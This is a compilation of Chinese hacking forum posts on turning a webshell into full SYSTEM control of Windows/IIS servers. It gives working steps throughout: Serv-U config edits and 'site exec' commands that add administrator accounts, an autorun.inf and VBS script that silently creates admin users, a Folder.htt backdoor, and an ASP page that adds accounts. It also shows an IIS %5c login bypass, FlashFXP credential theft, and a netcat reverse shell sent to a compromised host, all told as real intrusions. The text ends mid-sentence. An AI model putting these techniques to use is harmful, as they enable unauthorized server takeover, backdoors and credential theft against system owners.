最全的服務器提權

最全的WEBSHELL
c: d: e:.....
-------------------------------------------------------------------
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這裏能不能跳轉，咱們從這裏能夠獲取好多有用的信息好比Serv-U的路徑，
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看可否跳轉到這個目錄，若是行那就最好了，直接下它的CIF文件，破解獲得pcAnywhere密碼，登錄
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM，破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 徹底控制，不少時候沒做限制，把提高權限的工具上傳上去，而後執行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(若是服務器支持PHP）
c:\PHP(若是服務器支持PHP）
運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提高權限
還能夠用這段代碼試提高，好象不是很理想的
若是主機設置很變態，能夠試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啓動"寫入bat，vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什麼，放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁
腳本 編寫一個啓動/關機腳本 重起
刪SAM 錯
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權限提高21大法！
如下所有是本人提權時候的總結 不少方法至今沒有機會試驗也沒有成功，可是我是的確看見別人成功過
的。本人不才，除了第一種方法本身研究的，其餘的都是別人的經驗總結。但願對朋友有幫助！
1.radmin鏈接法
條件是你權限夠大，對方連防火牆也沒有。封裝個radmin上去，運行，開對方端口，而後radmin上去
。本人歷來米成功過。，端口到是給對方打開了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這裏下他的GIF
文件，在本地安裝pcanywhere上去
------------------------------------------

3.SAM破解
C:\windows\system32\config\
C:\WINNT\system32\config\ 下他的SAM 破解之

-------------------------------------
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\
引用：Serv-U，而後本地查看屬性，知道路徑後，看可否跳轉
進去後，若是有權限修改ServUDaemon.ini，加個用戶上去，密碼爲空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=
這個用戶具備最高權限，而後咱們就能夠ftp上去 quote site exec xxx 來提高權限

---------------------------------------------------------

5.c:\winnt\system32\inetsrv\data\
引用：就是這個目錄，一樣是erveryone 徹底控制，咱們所要作的就是把提高權限的工具上傳上去，
而後執行 --

---------------------------------------

6.SU溢出提權
這個網上教程N多 不詳細講解了

-------------------------------------

7.運行Csript
引用：運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提
升權限
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不一樣的機子放的位置不必定同樣)
咱們如今加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
能夠用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是否是加進去了

---------------------------------

8.腳本提權
c:\Documents and Settings\All Users\「開始」菜單\程序\啓動"寫入bat，vbs

----------------------------------

9.VNC
這個是小花的文章 HOHO
默認狀況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
咱們能夠用vncx4
破解它，vncx4使用很簡單，只要在命令行下輸入
c:\>vncx4 -W
而後順序輸入上面的每個十六進制數據，沒輸完一個回車一次就好了。

-----------------------------------------------
10.NC提權
給對方來個NC 可是條件是你要有足夠的運行權限 而後把它反彈到本身的電腦上 HOHO OK了

----------------------------------------------------------

11.社會工程學之GUEST提權
很簡單 查看他的擁護 通常來講 看到賬戶之後 密碼儘可能猜 可能用戶密碼同樣 也多是他QQ號 郵
箱號 手機號 儘可能看看 HOHO

--------------------------------
12.IPC空鏈接
若是對方真比較白癡的話 掃他的IPC 若是運氣好仍是弱口令

-------------------------------------------------
13.替換服務
這個不用說了吧？我的感受至關複雜

-----------------------------------------
14.autorun .inf
autorun=xxx.exe 這個=後面本身寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪一個盤均可以的 不相信
他不運行

-------------------------------------------------------
15.desktop.ini與Folder.htt
引用：首先，咱們如今本地創建一個文件夾，名字不重要，進入它，在空白處點右鍵，選擇"自定義
文件夾"（xp好像是不行的）一直下點，默認便可。完成後，你就會看到在此目錄下多了兩個名爲Folder
setting的文件架與desktop.ini的文件，（若是你看不到，先取消"隱藏受保護的操做系統文件"）而後
咱們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入如下代碼： <OBJECT
ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的後門文件名">
</OBJECT> 而後你將你的後門文件放在Folder setting目錄下，把此目錄與desktop.ini一塊兒上傳到對方
任意一個目錄下，就能夠了，只要等管理員瀏覽了此目錄，它就執行了咱們的後門

-----------------------------------

16.su覆蓋提權

本地安裝個su，將你本身的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉，重
起一下Serv-U，因而你上面的全部配置都與他的如出一轍了

--------------------------------------------------

17.SU轉發端口
43958這個是 Serv －U 的本地管理端口。FPIPE.exe上傳他，執行命令： Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 而後就能夠在本地安裝一個Serv-u，新建一個
服務器，IP填對方IP，賬號爲LocalAdministrator 密碼爲#1@$ak#.1k;0@p 鏈接上後你就能夠管理他的
Serv-u了

-----------------------------------------------------
18.SQL賬戶密碼泄露
若是對方開了MSSQL服務器，咱們就能夠經過用SQL鏈接器加管理員賬號（能夠從他的鏈接數據庫的
ASP文件中看到），由於MSSQL是默認的SYSTEM權限。
引用：對方沒有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass
中填入你所獲得的用戶名與密碼。format選擇xp_cmdshell"%s"便可。而後點擊connect，鏈接上後就可
以在CMD一欄中輸入你想要的CMD命令了

-------------------------------------------------
19.asp.dll
引用：由於asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不一樣的機子放的位置不必定相同
)
咱們如今加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,如今你能夠用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是否是加進去
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到
C:\Inetpub\AdminScripts>這個目錄下.
那麼若是你是一個管理員,你的機子被人用這招把asp提高爲system權限,那麼,這時,防的方法就是把
asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛纔的那些東東.

--------------------------------------

20.Magic Winmail
前提是你要有個webshell 引用：http://www.eviloctal.com/forum/read.php?tid=3587這裏去看吧
21.DBO……
其實 提高權限的方式不少的 就看你們怎麼利用了 HOHO 加油吧 將服務器控制到底！
感謝noangel
WEBSHELL權限提高
動網上傳漏洞，相信你們拿下很多肉雞吧，可是都是WEBSHELL，不能拿到系統權限，要如何拿到系統權限呢？這正是咱們此次要討論的內容
OK，進入個人WEBSHELL
啊哈，不錯，雙CPU，速度應該跟的上，不拿下你我怎麼甘心啊
輸入密碼，進入到裏面看看，有什麼好東西沒有，翻了下，好像也沒有什麼特別的東西，看看能不能進到其餘的盤符，點了下C盤，不錯不錯，能夠進去，這樣提高就大有但願了
一 serv－u提高
OK，看看他的PROGRAME裏面有些什麼程序，哦，有SERV-U，記得有次看到SERV-U有默認的用戶名和密碼，可是監聽的端口是43958，並且是隻有本地才能訪問的，可是咱們有端口轉發工具的啊，不怕。先看看他的SERV-U的版本是多少，telnet XXX.XXX.XXX.XXX 21
顯示居然是3.0的，唉，不得不說這個管理員真的不稱職。後來完畢後掃描了下，也只有FTP的洞沒有補。既然是這樣，咱們就開始咱們的提高權限了
上傳FPIPE，端口轉發工具， 圖三
在運行CMD命令裏輸入d:\\wwwroot\\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口
而後打開咱們本身機子上的SERV-U，點Serv－U服務器，點菜單欄上的的服務器，點新建服務器，而後輸入IP，輸入端口，記得端口是剛剛咱們轉發的 81端口。服務名稱隨便你喜歡，怎麼樣都行。而後是用戶名：LocalAdministrator 密碼：#l@$ak#.lk;0@P (密碼都是字母)
肯定，而後點剛剛建的服務器，而後就能夠看到已有的用戶，本身新建一個用戶，把全部權限加上。也不鎖定根目錄
接下來就是登錄了，登錄FTP必定要在CMD下登錄，
進入後通常命令和DOS同樣，添加用戶的時候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
若是對方開了3389的話，就不用我教你怎麼作了，沒開的話，新創建IPC鏈接，在上傳木馬或者是開啓3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
可是這樣要能夠訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。固然你也能夠直接執行木馬程序，還要一個木馬程序，可是語句就和最後兩句同樣，經過CMD執行木馬程序
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什麼，放到對方管理員最可能瀏覽的目錄下，以爲一個不夠，能夠多放幾個
Folder.htt添加代碼
<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="你的後門文件名">
</OBJECT>
可是後門和這兩個文件必需要放到一塊，有點問題，能夠結合啓動VBS，運行結束後，刪除上傳的後門.就是CODEBASE="shell.vbs".shell寫法如上
四
replace
替換法，能夠替換正在執行的文件。用這個幾乎能夠立刻獲得權限，可是我沒有作過試驗，能夠試下，將對方正在執行的文件替換爲和它文件名同樣的，捆綁了木馬的。爲何不直接替換木馬呢？若是替換的是關鍵程序，那不是就直接掛了？因此仍是捆綁好點
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
　[drive1:][path1]filename 指定源文件。
　[drive2:][path2] 指定要替換文件的
　　　　　　　　　　　　　 目錄。
　/A 把新文件加入目標目錄。不能和
　　　　　　　　　　　　　 /S 或 /U 命令行開關搭配使用。
　/P 替換文件或加入源文件以前會先提示您
　　　　　　　　　　　　　 進行確認。
　/R 替換隻讀文件以及未受保護的
　　　　　　　　　　　　　 文件。
　/S 替換目標目錄中全部子目錄的文件。
　　　　　　　　　　　　　 不能與 /A 命令選項
　　　　　　　　　　　　　 搭配使用。
　/W 等您插入磁盤之後再運行。
　/U 只會替換或更新比源文件日期早的文件。
　　　　　　　　　　　　　 不能與 /A 命令行開關搭配使用
這個命令沒有試驗過，看能不能替換不能訪問的文件夾下的文件，你們能夠試驗下
五
腳本
編寫一個啓動/關機腳本配置文件scripts.ini，這個文件名是固定的，不能改變。內容以下：
[Startup]
0CmdLine=a.bat
0Parameters=
將文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
A.BAT的內容能夠是NET USER yonghu mima
也能夠是NET USER ADMINistrator XXX
這樣能夠恢復你想要得任意用戶名的密碼，也能夠本身增長新的用戶，可是要依賴重啓，還有就是對SYSTEM32有寫的權限
六
SAM
若是能夠訪問對方的SYSTEM32的話，刪除對方的SAM文件，等他重啓之後就是ADMIN用戶密碼爲空
忽然又有了想法，能夠用REPLACE命令替換的嗎，能夠把你的SAM文件提取出來，上傳到他的任意目錄下，而後替換。不過不知道若是對SYSTEM32沒有權限訪問的話，能不能實現替換
--------------------------------------------------------------------------------
--
--
使用FlashFXP來提高權限 最近各位必定獲得很多肉雞吧，從前段時間的動網的upfile漏洞， 動力文章系統最新漏洞到first see發現的動網sql版本的一個超級大漏洞。有人必定忙的不易樂乎，你們的方法也不過是使用一下asp腳本的後門罷了。至於提 升權限的問題呵呵，不多有人能做一口氣完成。關鍵仍是在提高權限上作個問題上，很多服務器設置的很BT，你的asp木馬可能都用不了，還那裏來的提高啊。咱們獲得webshell也就是個低級別的用戶的權限，各類提高權限方法是可謂五花八門啊，如何提高就看你本身的妙 招了。
其一，若是服務器上有裝了pcanywhere服務端，管理員爲了便於管理也給了咱們方便，到系統盤的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere鏈接就ok了。
其二，若是對方有Serv-U你們不要罵我啊，經過修改ServUDaemon.ini和fpipe這軟件提高權限應該是不成問 題吧。
其三，經過替換系統服務來提高。
其四，查找conn和config這類型的文件看可否獲得sa或者mysql的相關密碼，可能會有所收穫等等。
本人在一次無聊的入侵過程當中發現了這個方法，使用Flashfxp也能提高權限，可是成功率高不高就看你本身的運氣了
本人www.xxx.com 經過bbs獲得了一個webshell，放了個小馬(如今海陽的名氣太大了偶不敢放)，並且已經將一段代碼插入了N個文件中，夠黑吧。提高權限沒時間作。在我放假回家後，一看我暈bbs升級到動網sp2了我放的小馬也被K了，人家的BBS是access版本的。鬱悶啊！忽然想起我將一個頁面插入了asp的後門，看看還有沒有但願了。輸www.xxx.com/xx.asp?id =1 好傢伙，還在！高興ing
圖1
因而上傳了一個asp的腳本的後門，怎麼提高權限呢?
在這個網站的主機上游蕩了N分鐘，在C:\\ Program Files下發現了FlashFXP文件夾(跟我同樣使用這個軟件本身內心暗想)圖2，因而就打了了Sites. dat這個文件(編輯)這是什麼東西密碼和用戶名，並且密碼是加了密的。
若是我把這些文件copy回本地也就是個人計算機中，替換我本地的相應文件會怎麼樣呢?
因而我就將Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個文件下載到個人計算機中替換了我電腦中flashfxp文件夾的相應文件。打開flashfxp 在站點中打開站點管理器一項。乖 乖發財了
對方管理員經過flashfxp鏈接的各個站點都在圖3，點擊鏈接。經過了因而咱們又有了一堆肉雞，咱們有ftp權限。上傳腳本 木馬~ 呵呵。
說了半天這提高權限的事情一點沒講啊
不要急，你們看看對方管理員的這站點管理器，有用戶名和密碼，密碼是星號的。惋惜啊！
又想起了在Sites.dat中也顯示了密碼和用戶名，並且密碼是加密的。
如今的星號密碼會不會也是加了密的?看看就好了唄。
怎麼看? 菜鳥了吧 手頭有個不錯的查看星號的軟件，就是xp星號密碼查看器，經過查看跟Sites.dat中加密了密碼作比較。看圖4和圖5 的比較 很顯然在站點管理器中查看到的密碼是明文顯示的。發財了吧
下一步就是使用xp星號密碼查看器這個軟件來提取密碼和用戶名。看者這些複雜的密碼，還真有點懷念當年玩sniff的時光。呵呵
密碼爲:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用戶名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密碼和用戶名已經做了必要的修改)
這麼多的信息，按社會工程學的概念來講，沒有管理員的密碼。打死我也不相信。最終我獲得了這個網站管理員的密碼從這堆東西中找到 的。
我想這個問題應該反饋到flashfxp官方，讓他們在下個版本中修正這個漏洞或者說是錯誤。通過後來測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應的文件就能夠在本地還原對方管理員的各個站點的密碼。但願你們在入侵的時候遇到fla shfxp的時候能想到這個方法，至少也能夠獲得一堆新的肉雞。不防試試?但願能給你們滲透帶來幫助。
--------------------------------------------------------------------------------
--
--
將asp權限提到最高by: cnqing from:http://friend.91eb.com
原本是要寫個提權asp木馬的，惋惜時間不是太多功底也不是太深。先把原理方法告訴你們好了。簡單說說，說的太麻煩沒有必要。懂了就行。
原理：
asp文件的教本解釋是由asp.dll運行的。由dllhost.exe啓動的。身分是IWAN_NAME。如果把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接啓動。身份是system
方法：
第一步。
獲得inprocesslsapiapps內容，用命令"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"。將獲得的一組dll複製下來。
第二步
寫一個bat內容爲"cscript C:\\Inetpub\\AdminScripts\\ adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" ·····
省略號爲複製下的內容。中間用空格分開不要帶回車符
最後運行這個bat就好了。
例如：
我用"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"獲得
"c:\\winnt\\system32\\inetsrv\\httpext.dll"
"c:\\winnt\\system32\\inetsrv\\httpodbc.dll"
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"
"C:\\WINNT\\System32\\msw3prt.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll"
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"
那麼你的bat就應該是：
cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps "C:\\Inetpub\\AdminScripts\\asp.dll" "c:\\winnt\\system32\\inetsrv\\httpext.dll" "c:\\winnt\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\System32\\msw3prt.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_aut\\author.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"
已測試成功！！
--------------------------------------------------------------------------------
--
--
利用%5c繞過驗證
利用%5c繞過驗證
---------------------------------------
lake2（http://mrhupo.126.com）
2004-11-27
---------------------------------------
說到%5c，你是否是想起了當前流行的那個%5c暴庫漏洞，呵呵，本文就是對%5c利用的探索（呵呵，固然有我提出的新東東，或許對你有幫助哦^_^）。
好，咱們先追根溯源，找到那個漏洞的老底。看看綠盟2001年的漏洞公告：http://www.nsfocus.net/index.php?ac...iew&bug_id=1429
N 年之前利用這個漏洞能夠實現目錄遍歷，雖然微軟出了補丁，不過好像補丁是用來限制iis只能訪問虛擬目錄的，因此漏洞仍是存在，只不過利用方式變了。對 iis來講，提交一個含有%5c的url可以找到文件，可是該文件裏以相對路徑引用的其餘文件卻找不到了（%5c是\\的url編碼，iis跳轉到上一級目錄去找，固然找不到；頭暈了吧，哈哈，我也頭暈啊）。
後來這個漏洞就被牛人挖掘出來了，也就是傳說中的%5c暴庫：因爲鏈接數據庫的文件引用的相對路徑，提交%5c找不到文件，因此致使出錯，iis就會老老實實的說出數據庫的路徑（不明白？找google）。
一個偶然的機會我發現還能夠利用%5c繞過asp的驗證；當咱們暴庫失敗的時候不妨試試。
廢話少說，看下面的代碼：
<!--#INCLUDE file="conn.asp" -->
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.createObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "請輸入正確地管理員密碼！"
response.end
else
session("admin")=1 \'登錄後寫入seesion中保存
response.write("登錄成功，請返回信息頁")
end if
%>
看到沒有，要想經過驗證必須讓數據庫裏的用戶名密碼與提交的一致；想到什麼？讓咱們再看看數據庫鏈接文件代碼：
<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>
啊，有容錯語句不能暴庫！等等，若是提交%5c數據庫找不到，因爲容錯，因此程序會繼續執行，那麼說來從數據庫獲得的用戶名密碼皆爲空（想一想有時暴庫失敗是否是看到空空的框架，由於數據都是空嘛），哈哈，這樣咱們就繞過驗證了！
知道怎麼作了吧，把登錄頁面保存到本地，修改提交的url，把最後一個/改爲%5c，用戶名密碼用空格（有的程序會檢查用戶名密碼是否爲空，空格會被程序過濾），提交，就ok了。
誒，各位不要覺得我本身沒事寫段代碼來搗鼓，實際上這個是咱們學校一個高手作的留言板程序，就掛在學校的主頁，呵呵。
既然弄懂了原理，固然要找實際漏洞啦，天然是拿大名鼎鼎的"洞"網論壇開刀。不過失敗了，由於它的數據庫鏈接文件裏有這麼一段：
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "數據庫鏈接出錯，請檢查鏈接字串。"
Response.End
End If
數據庫找不到程序就結束了，呵呵，空歡喜一場。
接着又去down了bbsxp論壇，打開數據庫鏈接文件，暈，根本沒有容錯語句；呵呵，不過能夠暴庫哦。
我又不是BT，因此不去找事了，寫篇文章，算是給各位高手提供資料吧。
總結一下這個攻擊方法成功的條件：一、數據庫鏈接用的相對路徑且僅有簡單的容錯語句；二、服務器iis版本爲4或5；三、程序裏不檢查空字符或者檢查時不過濾空格而比較時過濾空格；四、程序不能在一級目錄
至於防範，呵呵，既然攻擊條件知道了，防範措施天然也出來了^_^
--------------------------------------------------------------------------------
--
--
添加超級用戶的.asp代碼[藍屏的原創,凱文改進,Ms未公佈的漏洞]
做者：藍屏,凱文 文章來源：冰點極限
其實上個禮拜我和凱文就在個人肉雞上測試了,還有河馬史詩.結果是在user權限下成功添加Administrators組的用戶了(雖然我不敢相信個人眼睛).
上次凱文不發話,我不敢發佈啊....如今在他的blog 上看到他發佈了,就轉來了咯(比我上次測試時還改進了一點,加了個表單).這下你們有福咯```
反正代碼是對的，可是不多能成功，具體的看運氣了。。呵呵，下一步我想把他整合到海洋裏面去。嘿嘿。
<head>.network對象腳本權限提高漏洞利用工具</head>
<form action="useradd.asp" method=post>
用戶:<input name="username" type="text" value="kevin1986"><br>
密碼:<input name="passwd" type="password"><br>
<input type="submit" value="添 加">
</form>
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你仍是別買6+1了……省下2元錢買瓶可樂也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登陸")>0 then
response.write "雖然沒有錯誤,可是好象也沒創建成功.你必定很鬱悶吧"
else
Response.write "OMG!"&username&"賬號竟然成了!這但是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "請輸入輸入用戶名"
end if
end if
%>
如何繞過防火牆提高權限
本文講的重點是webshell權限的提高和繞過防火牆，高手勿笑。
廢話少說，我們進入正題。
首先肯定一下目標：http://www.sun***.com ，常見的虛擬主機。利用Upfile的漏洞相信你們得到webshell不難。咱們此次得到這個webshell，不是DVBBS，而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.sun***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp，用過動鯊的 door.exe的人都知道，這個是上傳asp木馬內容的。因而，上傳海洋2005a，成功得到webshell。
測試一下權限，在cmd裏運行set，得到主機一些信息，系統盤是D盤，也說明了咱們的webshell有運行權限的。那咱們看看C盤有什麼呢？難道是雙系統？瀏覽後發現沒有什麼系統文件，只有一些垃圾文件，暈死。不要緊，再來檢查一下，虛擬主機都有serv-u的，這臺也不例外，是5.0.0.8的。呵呵，是有本地溢出的呀，挖哈哈。
思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反鏈接得到系統shell。你們是否是發現海洋2005a那個上傳的組件很差用（反正我總遇到這個問題），不要緊，用rain改的一個無組件上傳，一共有3個文件，up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾，up.htm是本地用的，修改up.htm 裏的連接地址爲：http://www.sun***.com/lemon/upload.asp就能夠上傳了。
傳上了srv.exe和nc.exe在H:\\long\\sun***\\lemon（網站目錄）後，發現沒有運行權限。不要緊，根據經驗，通常系統下 D: \\Documents and Settings\\All Users\\是應該有運行權限的。因而想把文件copy過去，可是發現咱們的 webshell沒有對D盤寫的權限，暈死。
能夠瀏覽D:\\program files\\serv-u\\ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。
不能夠這麼就泄氣了，我忽然想到爲何系統不放在C盤了，難道C盤是FAT32分區的？（後來證實了咱們的想法。這裏說一下，若是主機有win98的系統盤，那裏99%是FAT32分區的。咱們還遇到過裝有Ghost的主機，爲了方便在DOS下備份，它的備份盤通常都是FAT分區的。）若是系統盤是 FAT32分區，則網站就沒有什麼安全性可言了。雖然C盤不是系統盤，可是咱們有執行權限。呵呵，copy srv.exe和nc.exe到c:\\，運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這裏的202.*.*.*是咱們的肉雞，在這以前咱們已經在肉雞上運行了nc –l –p 888。咱們在學校內網裏，沒有公網ip，不爽-ing。
咱們成功得到一個系統shell連上肉雞。（看起來簡單，其實這裏咱們也遇到過挫折，咱們發現有些版本的nc竟然沒有-e這個參數，還覺得全世界nc功能都同樣。後來又發現不一樣版本的nc互連不成功，會出現亂碼，沒辦法用。爲此，上傳 n次，錯誤n次，傻了n次，後來終於成功了。作黑客還真得有耐心和恆心。）
高興之餘，咱們仍不知足，由於這個shell實在是太慢了。因而，想用咱們最經常使用的Radmin，其實管理員一按Alt+Ctrl+Del，看進程就能發現 r_server了，可是仍是喜歡用它，是由於不會被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:\\ long\\sun***\\lemon，再用剛纔nc獲得的 shell把它們copy到d:\\winnt\\system32\\下，分別運行： r_server /install , net start r_server , r_server /pass:rain /save 。
一陣漫長的等待，終於顯示成功了。興沖沖用radmin連上去，發現鏈接失敗。暈死，忘了有防火牆了。上傳pslist和pskill上去，發現有 backice，木馬克星等。Kill掉他們雖然能夠登錄，但服務器重啓後仍是不行，終不是長久之計呀。防火牆是不防21，80等端口的，因而，咱們的思路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來，覆蓋本機的ServUDaemon.ini，在本機的serv-u上添加一個用戶名爲xr，密碼爲rain的系統賬號，加上全部權限。再用老辦法，上傳，用shell寫入D:\\program files\\serv-u\ \裏，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間，可是成功了，因而用flashfxp連上，發生 530錯誤。鬱悶，怎麼又失敗了。（根據經驗這樣應該就能夠了，但爲何不行沒有想通，請高手指點。）
無論了，咱們重啓serv-u就ok 了，怎麼重啓呢，開始想用 shutdown重啓系統，但那樣咱們就失去了nc這個shell，還可能被發現。後來，眼睛一亮，咱們不是有pskill嗎？剛纔用pslist發現有這個進程：ServUDaemon 。把它kill了。而後再運行D:\\program files\\serv-u\\ ServUAdmin.exe ，這裏要注意不是ServUDaemon.exe 。
好了，到這裏，咱們直接ftp上去吧，ls一下，哈哈，系統盤在個人掌握下。咱們能不能運行系統命令呢？是能夠的，這樣就能夠：
ftp>quote site exec net user xr rain /add
在webshell上運行net user，就能夠看見添加成功了。
整個入侵滲透到這就結束了，在一陣後清理打掃後。咱們就開始討論了。其實，突破防火牆有不少好的rootkit能夠作到的，可是咱們以爲系統自帶的服務纔是最安全的後門。
--------------------------------------------------------------------------------
--
--
asp.dll解析成system提高權限
網絡上傳統的提高asp權限爲系統的有兩種:
1.圖形化下的,把默認站點---->主目錄--->應用程序保護設置爲低,這樣就能夠把asp權限設置爲system.
但這種提高方法很容易被發現,因此網絡有另外一種通常是用adsutil.vbs來提高權限.而這個也是今天
我要談的關於adsutil.vbs提高權限.
2.用adsutil.vbs搞定.
在網絡上我看到了不少的教你用這種方法的動畫,文章,但我至今沒有看到一篇介紹原理的,下面我談談我我的的見解:
先舉個例子:
有一羣狗,這羣狗裏有幾個長老級狗物,它們擁有着至高無上的權限,而其它的狗,他們的權限則少得可憐.
轉到計算機上:
在IIS中,有幾個Dll文件是擁有特權限的,咱們能夠理解爲系統權限,就像長老級的狗.而解析asp的asp.dll則就像一隻
普通的狗,他的權限少得可憐.
那麼,若是asp.dll也成了長老級的狗的話,那麼asp不也就有了系統權限了嗎,這是能夠成立的.因此咱們的思路也就是
